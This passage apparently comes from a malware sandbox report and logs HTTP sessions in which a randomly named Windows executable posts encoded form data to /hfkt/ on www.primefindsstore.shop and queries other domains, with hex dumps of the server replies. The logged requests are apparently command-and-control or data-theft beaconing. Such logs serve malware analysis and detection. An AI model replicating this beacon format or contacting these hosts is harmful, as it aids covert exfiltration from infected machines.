                                            Jul 3, 2024 18:54:10.979861021 CEST485OUTGET /expp/?Z6ZTG=4RP2jfjc/CKkP2k0VFIzhmOcoxlGKDo9u/ZkfjmOk/GcJdogV5u478VHpy4Tx1zZR2PffU9j3QXLxJ/zQp1CY/gImr6l8nbjZW8kbJ4UJqZmHhNvkenHenANmOUPEa0Yb7H7CBE=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.hondamechanic.today
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:11.626230001 CEST113INHTTP/1.1 439
                                            date: Wed, 03 Jul 2024 16:54:11 GMT
                                            content-length: 0
                                            server: Parking/1.0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.64975023.105.172.12805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:16.859086990 CEST754OUTPOST /hfkt/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.primefindsstore.shop
                                            Origin: http://www.primefindsstore.shop
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.primefindsstore.shop/hfkt/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 4f 68 4a 31 36 76 51 55 76 73 77 71 35 68 35 38 33 49 79 66 78 34 61 56 63 77 48 4a 73 46 65 41 39 35 34 58 49 35 4f 49 76 30 79 46 64 58 43 31 74 45 4a 39 69 41 49 44 71 44 78 4a 77 72 46 45 5a 64 62 59 37 4e 76 63 32 30 4c 78 55 45 4f 30 57 6b 43 64 37 65 6b 77 37 32 33 39 72 36 65 73 79 6f 79 54 56 31 6e 4c 6f 76 65 4f 33 31 78 6d 31 79 55 39 74 32 74 4f 78 68 4f 4f 49 6c 4c 57 6c 68 36 35 49 58 63 44 6f 70 7a 49 61 66 77 4c 57 58 72 62 44 53 37 61 2f 59 65 56 46 2b 46 77 7a 4a 52 55 4f 31 6d 37 5a 55 36 49 6a 57 4b 33 56 68 2f 79 30 4c 34 6e 58 63 50 32 33 4b 6b 46 62 47 4b 77 71 44 66 62 6b 69 6d 74
                                            Data Ascii: Z6ZTG=OhJ16vQUvswq5h583Iyfx4aVcwHJsFeA954XI5OIv0yFdXC1tEJ9iAIDqDxJwrFEZdbY7Nvc20LxUEO0WkCd7ekw7239r6esyoyTV1nLoveO31xm1yU9t2tOxhOOIlLWlh65IXcDopzIafwLWXrbDS7a/YeVF+FwzJRUO1m7ZU6IjWK3Vh/y0L4nXcP23KkFbGKwqDfbkimt
                                            Jul 3, 2024 18:54:17.895632029 CEST1236INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=533f06efaad74dc03aa6e60a6ce0ee3f%7C%7C1720198457%7C%7C1720194857%7C%7Ce58761108355481112a576e70ea7b708; expires=Fri, 02-Aug-2024 16:54:17 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=72q7vrf1ctov17qs3optb9pvr5; path=/
                                            Pragma: no-cache
                                            Link: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"
                                            Content-Encoding: gzip
                                            Data Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 [TRUNCATED]
                                            Data Ascii: 3156}v8|Q7{LI.'vwm$9:I)qVH$%o;P(X|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!)*,l`9fP+y"v*JTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
                                            Jul 3, 2024 18:54:17.895693064 CEST1236INData Raw: 34 db ea fb d4 9f 3c 80 3e cb 31 ec c8 64 82 5d a6 15 84 25 05 29 a6 14 64 7a 4a 6d a3 58 2f d6 97 53 cb 2b 72 ea b8 a6 b0 0c 8d b3 40 13 b4 43 bb d0 9d 78 ac e7 a0 76 7e 28 fd f4 67 d2 1d 59 01 19 58 88 11 10 1a c1 b4 18 32 87 f9 34 64 26 f9 a9
                                            Data Ascii: 4<>1d]%)dzJmX/S+r@Cxv~(gYX24d&Cq~!{[?W}j}(ZZTUUM|>5(!^Ftad-Z#=j3ik&wAx^VW{--WlmF5:%RH)~x-FvV`q5'
                                            Jul 3, 2024 18:54:17.895704031 CEST448INData Raw: 32 79 fd 60 e4 f9 6a 59 12 31 db 92 3d 40 2c a6 95 32 e9 7d 28 ec 5c ad 4c 5c 61 fb 3e 08 54 54 49 41 14 73 7e de cd f3 75 c1 ef f3 0c 9a e0 29 8d ac ac 1f 9e d2 c8 72 ad f1 14 f4 d5 74 c9 53 5a 78 b8 86 79 4a 6b 4f d2 3b cf d8 f0 ca da e8 49 6d
                                            Data Ascii: 2y`jY1=@,2}(\L\a>TTIAs~u)rtSZxyJkO;Im>BG=}(,gOZM-}K_E=|u]t#PWm@~N{D+OeOopu=TYGweu&2u;kvW>XESD*:FCZZYWI^|-?x-O[CN)
                                            Jul 3, 2024 18:54:17.895894051 CEST1236INData Raw: 35 64 d7 c0 f5 c7 c9 25 34 8e cb ef 56 21 76 20 5d f9 82 bf b5 62 e5 29 b7 be 04 cd 06 f5 c3 97 a2 19 6b c2 d6 68 d8 c3 46 9e 95 f6 80 51 df 18 c1 1c 71 cd c8 78 39 fa 95 56 9e d2 81 e9 75 54 ea 59 c5 3b 7e b3 75 d5 8b aa 9f 03 d7 81 c2 a5 1d 09
                                            Data Ascii: 5d%4V!v ]b)khFQqx9VuTY;~u7A@zm|,]=\_KRw{{}X](,ZBN |([dmvpGWhCuY6I@X^@du_
                                            Jul 3, 2024 18:54:17.895905972 CEST1236INData Raw: a1 2f 76 40 c5 01 6c d0 03 03 0f 53 e3 2d 11 fd 9a 3f a2 2b 61 28 bb eb 54 a0 e5 d5 97 18 fa 4f a7 4f 31 7d 9f 85 4a 0e f8 00 5a e7 46 65 e0 ba a1 ba 21 c9 5c 6e a4 7e c6 b5 72 bb 81 65 5c 87 91 51 5d ec d8 37 e5 94 47 f0 56 b4 09 95 93 66 4d 8a
                                            Data Ascii: /v@lS-?+a(TOO1}JZFe!\n~re\Q]7GVfMW|7a6$?#K$ y]:h<]Sx-%wl|SUy\GjjG17^npC41s!3b>[O(32u-Eejp w=HB|]NkjhQj
                                            Jul 3, 2024 18:54:17.895916939 CEST1236INData Raw: 37 9d a7 39 8b 59 d0 dc fd da ce 62 32 1e 46 ad ed cc a6 01 cc 7c 21 ab 20 2d 8a 0a 80 1c bd 18 5f 8d e6 17 72 a5 39 5f 2d e9 95 52 a5 5d aa b6 f5 66 b5 5d 6f d7 f5 01 6b 99 55 a3 d2 af f6 db 75 46 75 a3 4e 59 9b d2 7a b9 49 ab 46 ab a5 89 45 9d
                                            Data Ascii: 79Yb2F|! -_r9_-R]f]okUuFuNYzIFEAbCQ+gCfb2E/<Eo{o%=tOyL.c#xL\!p0;O+O"-k2\QVkL#CzQ{0+#B.97X5rAtgMzk9P
                                            Jul 3, 2024 18:54:17.895929098 CEST1236INData Raw: 57 7d 39 13 d5 c2 47 47 44 b8 1d ad 6a 6a 1e 0f 70 3c c0 d8 d1 a1 3b d1 06 ae 8f 5a f0 7b b6 47 2b 65 5d 6f e8 cd 66 43 1b d3 fb 97 d1 73 6f 66 3c 22 d5 03 72 89 3c 22 47 c0 23 d2 75 27 04 78 84 1a 2f f8 e3 14 ea ff 03 af 6b ed bf f6 ce 42 bd fa
                                            Data Ascii: W}9GGDjjp<;Z{G+e]ofCsof<"r<"G#u'x/kBfmuUs=c<jc(Z;+gI]AV\4FYLF|5i+%Vo4V`FdFtPPZ})a7FodqKFraV|q@U*b
                                            Jul 3, 2024 18:54:17.896298885 CEST328INData Raw: 8e 31 27 35 12 d4 1c 3a 86 59 00 75 a6 8d 4d ad c6 3f dc db 5a ad 90 b1 28 bf 1e d5 93 b1 00 99 af 67 95 52 9a 70 58 da 7a aa 94 f7 a6 51 f0 50 03 aa ec 7a 89 3f 53 27 19 36 17 ba 5b b9 0a 77 27 2f 77 51 dc 57 a6 a1 e4 e5 b2 64 27 bb 40 9a c1 91
                                            Data Ascii: 1'5:YuM?Z(gRpXzQPz?S'6[w'/wQWd'@nE$;Hv0boyK^W]pUH"o\Q\zW6/]+{\)vtY z2nBe9\9$Ln&g^~xr)n>'+G6+"
                                            Jul 3, 2024 18:54:17.896311045 CEST1236INData Raw: e7 22 25 8f e6 5a f9 19 69 06 b0 55 0f a2 46 16 7f 59 bb 66 32 db ba 05 2b 1e 8f a3 e2 b4 78 52 1c c4 39 b9 d4 eb cf 49 bd be 2a f5 50 02 63 68 4f 75 d0 15 0b 23 1f 8c ec e5 3a a8 56 79 4e 82 57 7e 60 84 87 1b d7 60 96 62 0c 1a bc 9a 00 fa 07 93
                                            Data Ascii: "%ZiUFYf2+xR9I*PchOu#:VyNW~``bO8%*FmN/XpVL.GyVAWlb!>U\yUk_E;qnD'0n}\1-_] Bo0)](b\b$?.Y
                                            Jul 3, 2024 18:54:17.896451950 CEST1236INData Raw: 5e 0e ec b9 eb bb 06 ce 25 33 5e eb a0 b8 80 fc 20 f7 ff fc 83 32 4a e7 79 88 d4 a6 13 31 48 20 9c 43 0b 46 1e b0 38 e6 c5 f1 85 84 79 71 bc c0 80 46 0e ee 85 15 cf cf 0b 0a cb 73 dc fd 86 c0 7d 2b 0b fd 85 aa 00 6f fc 4c 19 bd 70 fd 3b 36 e4 42
                                            Data Ascii: ^%3^ 2Jy1H CF8yqFs}+oLp;6BcE.-r1O_;V:~c+^G}{.B&ffvP(.OdEry z@q75?SjsP0z&29\NjTG'yv!$y\gVb&UwY
                                            Jul 3, 2024 18:54:17.900835037 CEST1236INData Raw: 3a 66 ae cf f7 f9 67 68 b2 af 43 51 81 77 22 5b 78 c7 ca 9a 7e 7c c2 e7 65 3d 87 dc e3 11 e8 63 44 dd 87 6d 1a a0 9e 08 23 ef f8 8d e2 e2 7b f3 20 17 df b1 d5 f7 a9 8d 8f 36 c5 7d 07 34 81 aa ac ed c7 ca da 9e 67 7e 1c 53 e1 e1 3d a0 36 0d 90 ca
                                            Data Ascii: :fghCQw"[x~|e=cDm#{ 6}4g~S=6x]?'4#|t*)k.&_pXgem<!=&08'rGT=Q4O<BgfsSsq S8Q7:'@^W*vq2(j;s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.64975123.105.172.12805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:19.402909040 CEST778OUTPOST /hfkt/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.primefindsstore.shop
                                            Origin: http://www.primefindsstore.shop
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.primefindsstore.shop/hfkt/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 4f 68 4a 31 36 76 51 55 76 73 77 71 2f 78 4a 38 77 76 47 66 7a 59 61 57 51 51 48 4a 6a 6c 66 48 39 35 38 58 49 37 69 59 75 42 71 46 64 33 79 31 75 41 56 39 68 41 49 44 67 6a 78 4d 2b 4c 46 50 5a 64 58 32 37 4d 2f 63 32 33 33 78 55 42 71 30 57 54 65 61 37 4f 6b 32 32 57 33 2f 31 4b 65 73 79 6f 79 54 56 78 4c 68 6f 76 57 4f 33 45 68 6d 31 58 67 79 6b 57 74 50 34 42 4f 4f 4d 6c 4c 4b 6c 68 36 66 49 57 41 39 6f 72 37 49 61 65 41 4c 56 44 2f 61 57 43 37 51 79 34 65 46 43 66 77 58 71 6f 59 4e 51 47 4f 37 4e 69 57 4e 72 41 4c 74 4a 53 2f 52 6d 62 59 6c 58 65 58 45 33 71 6b 76 5a 47 79 77 34 55 54 38 72 57 44 4f 38 65 7a 2f 77 6f 6e 62 44 6f 4f 6e 4a 76 33 52 6b 58 6a 35 31 41 3d 3d
                                            Data Ascii: Z6ZTG=OhJ16vQUvswq/xJ8wvGfzYaWQQHJjlfH958XI7iYuBqFd3y1uAV9hAIDgjxM+LFPZdX27M/c233xUBq0WTea7Ok22W3/1KesyoyTVxLhovWO3Ehm1XgykWtP4BOOMlLKlh6fIWA9or7IaeALVD/aWC7Qy4eFCfwXqoYNQGO7NiWNrALtJS/RmbYlXeXE3qkvZGyw4UT8rWDO8ez/wonbDoOnJv3RkXj51A==
                                            Jul 3, 2024 18:54:20.505855083 CEST1236INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=70ed71b81025c39171072e3b0ce9172f%7C%7C1720198460%7C%7C1720194860%7C%7C9ca75b6a083e51ae3fd835288ebd32b3; expires=Fri, 02-Aug-2024 16:54:20 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=63p917bqijodufemh90e3p5q8d; path=/
                                            Pragma: no-cache
                                            Link: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"
                                            Content-Encoding: gzip
                                            Data Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 [TRUNCATED]
                                            Data Ascii: 3156}v8|Q7{LI.'vwm$9:I)qVH$%o;P(X|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!)*,l`9fP+y"v*JTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
                                            Jul 3, 2024 18:54:20.505884886 CEST1236INData Raw: 34 db ea fb d4 9f 3c 80 3e cb 31 ec c8 64 82 5d a6 15 84 25 05 29 a6 14 64 7a 4a 6d a3 58 2f d6 97 53 cb 2b 72 ea b8 a6 b0 0c 8d b3 40 13 b4 43 bb d0 9d 78 ac e7 a0 76 7e 28 fd f4 67 d2 1d 59 01 19 58 88 11 10 1a c1 b4 18 32 87 f9 34 64 26 f9 a9
                                            Data Ascii: 4<>1d]%)dzJmX/S+r@Cxv~(gYX24d&Cq~!{[?W}j}(ZZTUUM|>5(!^Ftad-Z#=j3ik&wAx^VW{--WlmF5:%RH)~x-FvV`q5'
                                            Jul 3, 2024 18:54:20.505898952 CEST448INData Raw: 32 79 fd 60 e4 f9 6a 59 12 31 db 92 3d 40 2c a6 95 32 e9 7d 28 ec 5c ad 4c 5c 61 fb 3e 08 54 54 49 41 14 73 7e de cd f3 75 c1 ef f3 0c 9a e0 29 8d ac ac 1f 9e d2 c8 72 ad f1 14 f4 d5 74 c9 53 5a 78 b8 86 79 4a 6b 4f d2 3b cf d8 f0 ca da e8 49 6d
                                            Data Ascii: 2y`jY1=@,2}(\L\a>TTIAs~u)rtSZxyJkO;Im>BG=}(,gOZM-}K_E=|u]t#PWm@~N{D+OeOopu=TYGweu&2u;kvW>XESD*:FCZZYWI^|-?x-O[CN)
                                            Jul 3, 2024 18:54:20.506022930 CEST1236INData Raw: 35 64 d7 c0 f5 c7 c9 25 34 8e cb ef 56 21 76 20 5d f9 82 bf b5 62 e5 29 b7 be 04 cd 06 f5 c3 97 a2 19 6b c2 d6 68 d8 c3 46 9e 95 f6 80 51 df 18 c1 1c 71 cd c8 78 39 fa 95 56 9e d2 81 e9 75 54 ea 59 c5 3b 7e b3 75 d5 8b aa 9f 03 d7 81 c2 a5 1d 09
                                            Data Ascii: 5d%4V!v ]b)khFQqx9VuTY;~u7A@zm|,]=\_KRw{{}X](,ZBN |([dmvpGWhCuY6I@X^@du_
                                            Jul 3, 2024 18:54:20.506037951 CEST1236INData Raw: a1 2f 76 40 c5 01 6c d0 03 03 0f 53 e3 2d 11 fd 9a 3f a2 2b 61 28 bb eb 54 a0 e5 d5 97 18 fa 4f a7 4f 31 7d 9f 85 4a 0e f8 00 5a e7 46 65 e0 ba a1 ba 21 c9 5c 6e a4 7e c6 b5 72 bb 81 65 5c 87 91 51 5d ec d8 37 e5 94 47 f0 56 b4 09 95 93 66 4d 8a
                                            Data Ascii: /v@lS-?+a(TOO1}JZFe!\n~re\Q]7GVfMW|7a6$?#K$ y]:h<]Sx-%wl|SUy\GjjG17^npC41s!3b>[O(32u-Eejp w=HB|]NkjhQj
                                            Jul 3, 2024 18:54:20.506234884 CEST1236INData Raw: 37 9d a7 39 8b 59 d0 dc fd da ce 62 32 1e 46 ad ed cc a6 01 cc 7c 21 ab 20 2d 8a 0a 80 1c bd 18 5f 8d e6 17 72 a5 39 5f 2d e9 95 52 a5 5d aa b6 f5 66 b5 5d 6f d7 f5 01 6b 99 55 a3 d2 af f6 db 75 46 75 a3 4e 59 9b d2 7a b9 49 ab 46 ab a5 89 45 9d
                                            Data Ascii: 79Yb2F|! -_r9_-R]f]okUuFuNYzIFEAbCQ+gCfb2E/<Eo{o%=tOyL.c#xL\!p0;O+O"-k2\QVkL#CzQ{0+#B.97X5rAtgMzk9P
                                            Jul 3, 2024 18:54:20.506247044 CEST1236INData Raw: 57 7d 39 13 d5 c2 47 47 44 b8 1d ad 6a 6a 1e 0f 70 3c c0 d8 d1 a1 3b d1 06 ae 8f 5a f0 7b b6 47 2b 65 5d 6f e8 cd 66 43 1b d3 fb 97 d1 73 6f 66 3c 22 d5 03 72 89 3c 22 47 c0 23 d2 75 27 04 78 84 1a 2f f8 e3 14 ea ff 03 af 6b ed bf f6 ce 42 bd fa
                                            Data Ascii: W}9GGDjjp<;Z{G+e]ofCsof<"r<"G#u'x/kBfmuUs=c<jc(Z;+gI]AV\4FYLF|5i+%Vo4V`FdFtPPZ})a7FodqKFraV|q@U*b
                                            Jul 3, 2024 18:54:20.506257057 CEST328INData Raw: 8e 31 27 35 12 d4 1c 3a 86 59 00 75 a6 8d 4d ad c6 3f dc db 5a ad 90 b1 28 bf 1e d5 93 b1 00 99 af 67 95 52 9a 70 58 da 7a aa 94 f7 a6 51 f0 50 03 aa ec 7a 89 3f 53 27 19 36 17 ba 5b b9 0a 77 27 2f 77 51 dc 57 a6 a1 e4 e5 b2 64 27 bb 40 9a c1 91
                                            Data Ascii: 1'5:YuM?Z(gRpXzQPz?S'6[w'/wQWd'@nE$;Hv0boyK^W]pUH"o\Q\zW6/]+{\)vtY z2nBe9\9$Ln&g^~xr)n>'+G6+"
                                            Jul 3, 2024 18:54:20.506463051 CEST1236INData Raw: e7 22 25 8f e6 5a f9 19 69 06 b0 55 0f a2 46 16 7f 59 bb 66 32 db ba 05 2b 1e 8f a3 e2 b4 78 52 1c c4 39 b9 d4 eb cf 49 bd be 2a f5 50 02 63 68 4f 75 d0 15 0b 23 1f 8c ec e5 3a a8 56 79 4e 82 57 7e 60 84 87 1b d7 60 96 62 0c 1a bc 9a 00 fa 07 93
                                            Data Ascii: "%ZiUFYf2+xR9I*PchOu#:VyNW~``bO8%*FmN/XpVL.GyVAWlb!>U\yUk_E;qnD'0n}\1-_] Bo0)](b\b$?.Y
                                            Jul 3, 2024 18:54:20.506477118 CEST1236INData Raw: 5e 0e ec b9 eb bb 06 ce 25 33 5e eb a0 b8 80 fc 20 f7 ff fc 83 32 4a e7 79 88 d4 a6 13 31 48 20 9c 43 0b 46 1e b0 38 e6 c5 f1 85 84 79 71 bc c0 80 46 0e ee 85 15 cf cf 0b 0a cb 73 dc fd 86 c0 7d 2b 0b fd 85 aa 00 6f fc 4c 19 bd 70 fd 3b 36 e4 42
                                            Data Ascii: ^%3^ 2Jy1H CF8yqFs}+oLp;6BcE.-r1O_;V:~c+^G}{.B&ffvP(.OdEry z@q75?SjsP0z&29\NjTG'yv!$y\gVb&UwY
                                            Jul 3, 2024 18:54:20.510879040 CEST1236INData Raw: 3a 66 ae cf f7 f9 67 68 b2 af 43 51 81 77 22 5b 78 c7 ca 9a 7e 7c c2 e7 65 3d 87 dc e3 11 e8 63 44 dd 87 6d 1a a0 9e 08 23 ef f8 8d e2 e2 7b f3 20 17 df b1 d5 f7 a9 8d 8f 36 c5 7d 07 34 81 aa ac ed c7 ca da 9e 67 7e 1c 53 e1 e1 3d a0 36 0d 90 ca
                                            Data Ascii: :fghCQw"[x~|e=cDm#{ 6}4g~S=6x]?'4#|t*)k.&_pXgem<!=&08'rGT=Q4O<BgfsSsq S8Q7:'@^W*vq2(j;s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.64975223.105.172.12805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:21.933526993 CEST1791OUTPOST /hfkt/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.primefindsstore.shop
                                            Origin: http://www.primefindsstore.shop
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.primefindsstore.shop/hfkt/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 4f 68 4a 31 36 76 51 55 76 73 77 71 2f 78 4a 38 77 76 47 66 7a 59 61 57 51 51 48 4a 6a 6c 66 48 39 35 38 58 49 37 69 59 75 42 69 46 64 45 36 31 74 6e 68 39 67 41 49 44 37 6a 78 4e 2b 4c 46 6f 5a 64 2f 36 37 4d 7a 69 32 78 7a 78 47 7a 69 30 55 69 65 61 30 4f 6b 32 2f 32 33 2b 72 36 65 44 79 6f 43 58 56 78 37 68 6f 76 57 4f 33 48 70 6d 79 43 55 79 69 57 74 4f 78 68 50 63 49 6c 4c 32 6c 68 43 68 49 57 46 47 70 61 62 49 61 2b 51 4c 51 77 58 61 4c 79 37 57 7a 34 66 61 43 66 73 49 71 6f 55 37 51 48 37 65 4e 6b 71 4e 6f 58 69 45 62 77 6e 56 35 34 63 6b 45 4e 58 76 73 73 39 52 64 47 43 56 37 46 44 38 79 45 4c 32 37 72 69 6f 79 4b 71 68 4b 6f 43 4e 43 34 36 62 79 30 2b 79 6a 74 6d 2b 42 67 39 59 4f 69 42 47 55 32 47 74 41 57 77 45 2b 47 2b 59 69 76 6a 7a 39 59 33 30 44 46 30 7a 6e 41 35 58 72 4e 4a 59 5a 30 30 46 36 7a 5a 52 7a 6f 4b 38 4c 65 79 2b 44 47 77 58 76 2b 41 6a 57 4a 33 4c 71 63 59 73 56 4b 44 6c 32 6a 6c 52 7a 46 79 6e 6c 31 61 65 53 66 5a 57 70 39 66 47 50 64 4c 30 49 58 55 7a [TRUNCATED]
                                            Data Ascii: Z6ZTG=OhJ16vQUvswq/xJ8wvGfzYaWQQHJjlfH958XI7iYuBiFdE61tnh9gAID7jxN+LFoZd/67Mzi2xzxGzi0Uiea0Ok2/23+r6eDyoCXVx7hovWO3HpmyCUyiWtOxhPcIlL2lhChIWFGpabIa+QLQwXaLy7Wz4faCfsIqoU7QH7eNkqNoXiEbwnV54ckENXvss9RdGCV7FD8yEL27rioyKqhKoCNC46by0+yjtm+Bg9YOiBGU2GtAWwE+G+Yivjz9Y30DF0znA5XrNJYZ00F6zZRzoK8Ley+DGwXv+AjWJ3LqcYsVKDl2jlRzFynl1aeSfZWp9fGPdL0IXUz80LN2qluxq2bEH85fgQkh0fT1G0ff+QSe3dkCYxEnPZcdPViMl2b8XQWeAEnxEg1r75j7KwMSyHGtJp8NT11riCMgePpck9pj6xug5uSLP8ZrQA+v+04Ts0cp/fFQXE7J1UmNZ3OtEYHd70Q+Sh8fUJrpilJ8D7fmCJT9B94zo2LcmZ13tOa2Ykn/U2de02Sy7zHbVvQxj3cOR+Lj9+0GuF0dsgTNJy+IYBRyzROKAIO3CIiY/7LkCnHszvOv+DQ50Ug8u5Jy3q6CMSkkR/A6Qz6YhNdcC6x5VsP7Kvpvz7GLrmyhDN4SGq1StV+Q5xoAM+slA+Fll29rWWhJkv0xoFQCupFU16i0tVsYWCQ6Obn9GiDoMD4HkLufyPmlsj+YXEPH/fEnsCI3hDQTOLboby7mgU83BrrNypAaIAE+i8bjI1rPhelLY2WymxVhJleOZr6qYWP3tYZvGzy0cFLopEXWV1mv8tQ72qwGY5WpPaiKAT8PXUxlBgsI2YzTh55m7T+SV8StJUBjRKKFYFtLtnjOJl2E5Zqy8BPS9rFeYfVuugsOpSIXxeo93RwOcqdfH5rA2AtUITDaED6+Vubimes/Y09XAa7b7Dw242LFRBRFkvdL2CWVE8kHOguS1LzgeL59TPe2seaml3P51vLdMDtTnyxFk8gD